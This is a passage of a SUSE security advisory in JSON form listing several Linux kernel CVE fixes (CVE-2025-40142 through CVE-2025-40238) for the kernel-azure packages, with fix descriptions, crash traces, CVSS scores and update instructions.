"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nALSA: pcm: Disable bottom softirqs as part of spin_lock_irq() on PREEMPT_RT\n\nsnd_pcm_group_lock_irq() acquires a spinlock_t and disables interrupts\nvia spin_lock_irq(). This also implicitly disables the handling of\nsoftirqs such as TIMER_SOFTIRQ.\nOn PREEMPT_RT softirqs are preemptible and spin_lock_irq() does not\ndisable them. That means a timer can be invoked during spin_lock_irq()\non the same CPU. Due to synchronisations reasons local_bh_disable() has\na per-CPU lock named softirq_ctrl.lock which synchronizes individual\nsoftirq against each other.\nsyz-bot managed to trigger a lockdep report where softirq_ctrl.lock is\nacquired in hrtimer_cancel() in addition to hrtimer_run_softirq(). This\nis a possible deadlock.\n\nThe softirq_ctrl.lock can not be made part of spin_lock_irq() as this\nwould lead to too much synchronisation against individual threads on the\nsystem. To avoid the possible deadlock, softirqs must be manually\ndisabled before the lock is acquired.\n\nDisable softirqs before the lock is acquired on PREEMPT_RT.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40142",
"url": "https://www.suse.com/security/cve/CVE-2025-40142"
},
{
"category": "external",
"summary": "SUSE Bug 1253348 for CVE-2025-40142",
"url": "https://bugzilla.suse.com/1253348"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-12T11:26:05Z",
"details": "moderate"
}
],
"title": "CVE-2025-40142"
},
{
"cve": "CVE-2025-40166",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40166"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/xe/guc: Check GuC running state before deregistering exec queue\n\nIn normal operation, a registered exec queue is disabled and\nderegistered through the GuC, and freed only after the GuC confirms\ncompletion. However, if the driver is forced to unbind while the exec\nqueue is still running, the user may call exec_destroy() after the GuC\nhas already been stopped and CT communication disabled.\n\nIn this case, the driver cannot receive a response from the GuC,\npreventing proper cleanup of exec queue resources. Fix this by directly\nreleasing the resources when GuC is not running.\n\nHere is the failure dmesg log:\n\"\n[ 468.089581] ---[ end trace 0000000000000000 ]---\n[ 468.089608] pci 0000:03:00.0: [drm] *ERROR* GT0: GUC ID manager unclean (1/65535)\n[ 468.090558] pci 0000:03:00.0: [drm] GT0: total 65535\n[ 468.090562] pci 0000:03:00.0: [drm] GT0: used 1\n[ 468.090564] pci 0000:03:00.0: [drm] GT0: range 1..1 (1)\n[ 468.092716] ------------[ cut here ]------------\n[ 468.092719] WARNING: CPU: 14 PID: 4775 at drivers/gpu/drm/xe/xe_ttm_vram_mgr.c:298 ttm_vram_mgr_fini+0xf8/0x130 [xe]\n\"\n\nv2: use xe_uc_fw_is_running() instead of xe_guc_ct_enabled().\n As CT may go down and come back during VF migration.\n\n(cherry picked from commit 9b42321a02c50a12b2beb6ae9469606257fbecea)",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40166",
"url": "https://www.suse.com/security/cve/CVE-2025-40166"
},
{
"category": "external",
"summary": "SUSE Bug 1253433 for CVE-2025-40166",
"url": "https://bugzilla.suse.com/1253433"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-12T11:26:05Z",
"details": "moderate"
}
],
"title": "CVE-2025-40166"
},
{
"cve": "CVE-2025-40177",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40177"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\naccel/qaic: Fix bootlog initialization ordering\n\nAs soon as we queue MHI buffers to receive the bootlog from the device,\nwe could be receiving data. Therefore all the resources needed to\nprocess that data need to be setup prior to queuing the buffers.\n\nWe currently initialize some of the resources after queuing the buffers\nwhich creates a race between the probe() and any data that comes back\nfrom the device. If the uninitialized resources are accessed, we could\nsee page faults.\n\nFix the init ordering to close the race.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40177",
"url": "https://www.suse.com/security/cve/CVE-2025-40177"
},
{
"category": "external",
"summary": "SUSE Bug 1253443 for CVE-2025-40177",
"url": "https://bugzilla.suse.com/1253443"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-12T11:26:05Z",
"details": "moderate"
}
],
"title": "CVE-2025-40177"
},
{
"cve": "CVE-2025-40181",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40181"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nx86/kvm: Force legacy PCI hole to UC when overriding MTRRs for TDX/SNP\n\nWhen running as an SNP or TDX guest under KVM, force the legacy PCI hole,\ni.e. memory between Top of Lower Usable DRAM and 4GiB, to be mapped as UC\nvia a forced variable MTRR range.\n\nIn most KVM-based setups, legacy devices such as the HPET and TPM are\nenumerated via ACPI. ACPI enumeration includes a Memory32Fixed entry, and\noptionally a SystemMemory descriptor for an OperationRegion, e.g. if the\ndevice needs to be accessed via a Control Method.\n\nIf a SystemMemory entry is present, then the kernel\u0027s ACPI driver will\nauto-ioremap the region so that it can be accessed at will. However, the\nACPI spec doesn\u0027t provide a way to enumerate the memory type of\nSystemMemory regions, i.e. there\u0027s no way to tell software that a region\nmust be mapped as UC vs. WB, etc. As a result, Linux\u0027s ACPI driver always\nmaps SystemMemory regions using ioremap_cache(), i.e. as WB on x86.\n\nThe dedicated device drivers however, e.g. the HPET driver and TPM driver,\nwant to map their associated memory as UC or WC, as accessing PCI devices\nusing WB is unsupported.\n\nOn bare metal and non-CoCO, the conflicting requirements \"work\" as firmware\nconfigures the PCI hole (and other device memory) to be UC in the MTRRs.\nSo even though the ACPI mappings request WB, they are forced to UC- in the\nkernel\u0027s tracking due to the kernel properly handling the MTRR overrides,\nand thus are compatible with the drivers\u0027 requested WC/UC-.\n\nWith force WB MTRRs on SNP and TDX guests, the ACPI mappings get their\nrequested WB if the ACPI mappings are established before the dedicated\ndriver code attempts to initialize the device. E.g. if acpi_init()\nruns before the corresponding device driver is probed, ACPI\u0027s WB mapping\nwill \"win\", and result in the driver\u0027s ioremap() failing because the\nexisting WB mapping isn\u0027t compatible with the requested WC/UC-.\n\nE.g. when a TPM is emulated by the hypervisor (ignoring the security\nimplications of relying on what is allegedly an untrusted entity to store\nmeasurements), the TPM driver will request UC and fail:\n\n [ 1.730459] ioremap error for 0xfed40000-0xfed45000, requested 0x2, got 0x0\n [ 1.732780] tpm_tis MSFT0101:00: probe with driver tpm_tis failed with error -12\n\nNote, the \u00270x2\u0027 and \u00270x0\u0027 values refer to \"enum page_cache_mode\", not x86\u0027s\nmemtypes (which frustratingly are an almost pure inversion; 2 == WB, 0 == UC).\nE.g. tracing mapping requests for TPM TIS yields:\n\n Mapping TPM TIS with req_type = 0\n WARNING: CPU: 22 PID: 1 at arch/x86/mm/pat/memtype.c:530 memtype_reserve+0x2ab/0x460\n Modules linked in:\n CPU: 22 UID: 0 PID: 1 Comm: swapper/0 Tainted: G W 6.16.0-rc7+ #2 VOLUNTARY\n Tainted: [W]=WARN\n Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 05/29/2025\n RIP: 0010:memtype_reserve+0x2ab/0x460\n __ioremap_caller+0x16d/0x3d0\n ioremap_cache+0x17/0x30\n x86_acpi_os_ioremap+0xe/0x20\n acpi_os_map_iomem+0x1f3/0x240\n acpi_os_map_memory+0xe/0x20\n acpi_ex_system_memory_space_handler+0x273/0x440\n acpi_ev_address_space_dispatch+0x176/0x4c0\n acpi_ex_access_region+0x2ad/0x530\n acpi_ex_field_datum_io+0xa2/0x4f0\n acpi_ex_extract_from_field+0x296/0x3e0\n acpi_ex_read_data_from_field+0xd1/0x460\n acpi_ex_resolve_node_to_value+0x2ee/0x530\n acpi_ex_resolve_to_value+0x1f2/0x540\n acpi_ds_evaluate_name_path+0x11b/0x190\n acpi_ds_exec_end_op+0x456/0x960\n acpi_ps_parse_loop+0x27a/0xa50\n acpi_ps_parse_aml+0x226/0x600\n acpi_ps_execute_method+0x172/0x3e0\n acpi_ns_evaluate+0x175/0x5f0\n acpi_evaluate_object+0x213/0x490\n acpi_evaluate_integer+0x6d/0x140\n acpi_bus_get_status+0x93/0x150\n acpi_add_single_object+0x43a/0x7c0\n acpi_bus_check_add+0x149/0x3a0\n acpi_bus_check_add_1+0x16/0x30\n acpi_ns_walk_namespace+0x22c/0x360\n acpi_walk_namespace+0x15c/0x170\n acpi_bus_scan+0x1dd/0x200\n acpi_scan_init+0xe5/0x2b0\n acpi_init+0x264/0x5b0\n do_one_i\n---truncated---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40181",
"url": "https://www.suse.com/security/cve/CVE-2025-40181"
},
{
"category": "external",
"summary": "SUSE Bug 1253471 for CVE-2025-40181",
"url": "https://bugzilla.suse.com/1253471"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-12T11:26:05Z",
"details": "moderate"
}
],
"title": "CVE-2025-40181"
},
{
"cve": "CVE-2025-40202",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40202"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nipmi: Rework user message limit handling\n\nThe limit on the number of user messages had a number of issues,\nimproper counting in some cases and a use after free.\n\nRestructure how this is all done to handle more in the receive message\nallocation routine, so all refcouting and user message limit counts\nare done in that routine. It\u0027s a lot cleaner and safer.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40202",
"url": "https://www.suse.com/security/cve/CVE-2025-40202"
},
{
"category": "external",
"summary": "SUSE Bug 1253451 for CVE-2025-40202",
"url": "https://bugzilla.suse.com/1253451"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-12T11:26:05Z",
"details": "moderate"
}
],
"title": "CVE-2025-40202"
},
{
"cve": "CVE-2025-40238",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40238"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/mlx5: Fix IPsec cleanup over MPV device\n\nWhen we do mlx5e_detach_netdev() we eventually disable blocking events\nnotifier, among those events are IPsec MPV events from IB to core.\n\nSo before disabling those blocking events, make sure to also unregister\nthe devcom device and mark all this device operations as complete,\nin order to prevent the other device from using invalid netdev\nduring future devcom events which could cause the trace below.\n\nBUG: kernel NULL pointer dereference, address: 0000000000000010\nPGD 146427067 P4D 146427067 PUD 146488067 PMD 0\nOops: Oops: 0000 [#1] SMP\nCPU: 1 UID: 0 PID: 7735 Comm: devlink Tainted: GW 6.12.0-rc6_for_upstream_min_debug_2024_11_08_00_46 #1\nTainted: [W]=WARN\nHardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS rel-1.13.0-0-gf21b5a4aeb02-prebuilt.qemu.org 04/01/2014\nRIP: 0010:mlx5_devcom_comp_set_ready+0x5/0x40 [mlx5_core]\nCode: 00 01 48 83 05 23 32 1e 00 01 41 b8 ed ff ff ff e9 60 ff ff ff 48 83 05 00 32 1e 00 01 eb e3 66 0f 1f 44 00 00 0f 1f 44 00 00 \u003c48\u003e 8b 47 10 48 83 05 5f 32 1e 00 01 48 8b 50 40 48 85 d2 74 05 40\nRSP: 0018:ffff88811a5c35f8 EFLAGS: 00010206\nRAX: ffff888106e8ab80 RBX: ffff888107d7e200 RCX: ffff88810d6f0a00\nRDX: ffff88810d6f0a00 RSI: 0000000000000001 RDI: 0000000000000000\nRBP: ffff88811a17e620 R08: 0000000000000040 R09: 0000000000000000\nR10: ffff88811a5c3618 R11: 0000000de85d51bd R12: ffff88811a17e600\nR13: ffff88810d6f0a00 R14: 0000000000000000 R15: ffff8881034bda80\nFS: 00007f27bdf89180(0000) GS:ffff88852c880000(0000) knlGS:0000000000000000\nCS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: 0000000000000010 CR3: 000000010f159005 CR4: 0000000000372eb0\nDR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000\nDR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400\nCall Trace:\n \u003cTASK\u003e\n ? __die+0x20/0x60\n ? page_fault_oops+0x150/0x3e0\n ? exc_page_fault+0x74/0x130\n ? asm_exc_page_fault+0x22/0x30\n ? mlx5_devcom_comp_set_ready+0x5/0x40 [mlx5_core]\n mlx5e_devcom_event_mpv+0x42/0x60 [mlx5_core]\n mlx5_devcom_send_event+0x8c/0x170 [mlx5_core]\n blocking_event+0x17b/0x230 [mlx5_core]\n notifier_call_chain+0x35/0xa0\n blocking_notifier_call_chain+0x3d/0x60\n mlx5_blocking_notifier_call_chain+0x22/0x30 [mlx5_core]\n mlx5_core_mp_event_replay+0x12/0x20 [mlx5_core]\n mlx5_ib_bind_slave_port+0x228/0x2c0 [mlx5_ib]\n mlx5_ib_stage_init_init+0x664/0x9d0 [mlx5_ib]\n ? idr_alloc_cyclic+0x50/0xb0\n ? __kmalloc_cache_noprof+0x167/0x340\n ? __kmalloc_noprof+0x1a7/0x430\n __mlx5_ib_add+0x34/0xd0 [mlx5_ib]\n mlx5r_probe+0xe9/0x310 [mlx5_ib]\n ? kernfs_add_one+0x107/0x150\n ? __mlx5_ib_add+0xd0/0xd0 [mlx5_ib]\n auxiliary_bus_probe+0x3e/0x90\n really_probe+0xc5/0x3a0\n ? driver_probe_device+0x90/0x90\n 